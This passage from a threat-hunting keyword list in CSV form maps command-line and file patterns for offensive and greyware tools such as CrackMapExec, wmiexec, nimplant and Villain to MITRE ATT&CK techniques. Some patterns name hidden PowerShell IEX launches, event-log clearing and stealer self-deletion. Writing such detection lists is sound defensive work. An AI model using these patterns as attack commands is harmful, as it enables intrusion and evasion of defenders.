- TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*cloudsploit *","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*cloudsploit*cloudtrail*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*cloudsploit/index.js*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. 
These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*cloudsploit/scans*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*CloudSploitSupplemental*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. 
These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*cloudtrail__csv_injection*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*clr2of8/GatherContacts*","offensive_tool_keyword","GatherContacts","A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results.As part of reconnaissance when performing a penetration test. it is often useful to gather employee names that can then be massaged into email addresses and usernames. The usernames may come in handy for performing a password spraying attack for example. 
One easy way to gather employee names is to use the following Burp Suite Pro extension as described below.","T1593 - T1533 - T1087","TA0043 - TA0002","N/A","N/A","Information Gathering","https://github.com/clr2of8/GatherContacts","1","1","N/A","N/A","2","169","44","2022-08-27T13:28:08Z","2018-03-29T14:46:14Z" +"*cmbndhnoonmghfofefkcccljbkdpamhi_14678.crx*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*cmd /c * --bypass-uac*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*cmd /c * --remote-impersonation*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*cmd /c *if exist *.txt echo ImHere*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*cmd /c mklink /d * HarddiskVolumeShadowCopy1*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*cmd /c whoami* bypass*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*cmd smb *-u*-p*","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cmd* wevtutil.exe cl *","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*cmd*echo*\pipe\*","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. 
Getsystem is used to elevate privilege to SYSTEM account","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*cmd.exe /S /D /c* echo 123","greyware_tool_keyword","echo","Adversaries may attempt to test echo command after exploitation","T1059.001 - T1059.003","TA0002 - TA0006","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*cmd.exe /c *echo test > C:\Users\Public\test.txt*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" +"*cmd.exe /c chcp >&2*","greyware_tool_keyword","chcp","chcp displays the number of the active console code page","T1059 - T1027","TA0002 - TA0009","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cmd.exe /c echo * > \\.\pipe\*","greyware_tool_keyword","echo","Named pipe impersonation","T1134.002 - T1055 - T1548.002","TA0004 - TA0003 - TA0002","N/A","N/A","Privilege Escalation","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*cmd.exe /c rundll32.exe agressor.dll*stealth*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out 
writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" +"*cmd.exe /c sc start plumber*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*cmd.exe /c timeout /t 5 & del /f /q *%s* & exit*","offensive_tool_keyword","mars stealer","Self-removal 'mars stealer' command","T1587","TA0002","mars stealer","","Malware","https://3xp0rt.com/posts/mars-stealer","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cmd.exe /C wmic /node:* /user:* /password:* os get caption*","greyware_tool_keyword","wmic","gather information about Windows OS version and licensing on the hosts","T1047 - T1016 - T1082","TA0007 - TA0002 - TA0005","N/A","N/A","Discovery","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/","1","0","greyware tool - risks of False positive !","6","9","N/A","N/A","N/A","N/A" +"*cmd.exe /c zoom1.msi*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cmd.exe /Q /c *.bat *> \\127.0.0.1\ADMIN$\* 2&*","offensive_tool_keyword","wmiexec","wmiexec.py from 
impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c /start /min powershell.exe -nop -c*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c hostname1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c nslookup 1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used 
by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c powershell.exe -nop -w -hidden -c*IEX*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c powershelll.exe 1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c quser 1 > \\127.0.0.1\ADMIN$\*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by 
metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c start *stage1.exe 1*","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cmd.exe*\TEMP\ScreenConnect\*.cmd*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*cmd/backdoor.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*cmd/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*cmd/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*cmd/localrelay*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*cmd/merlinagent/*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*cmd/merlinagentdll/*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 
- T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*cmd/setuid.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*cmd_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*cmd_powershell.cpp*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*cmd_shellcodex64.*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*cmd_shellcodex86.*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" 
+"*Cmd-Execute-Assembly.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Cmd-Inline-Execute.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*cmdinspector OFF*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*cmdinspector ON*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*cmdshell *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Cmd-Shinject.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Cmd-Upload.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*cme -d * -*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme -d *localhost*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme*-macOS-latest-*","offensive_tool_keyword","crackmapexec","macOS default copiled executable name for crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme*-ubuntu-latest-*","offensive_tool_keyword","crackmapexec","ubuntu default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme*-windows-latest-*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme/cme.conf*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme_bloodhound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_dfscoerce_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_get-desc-users_pass_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - 
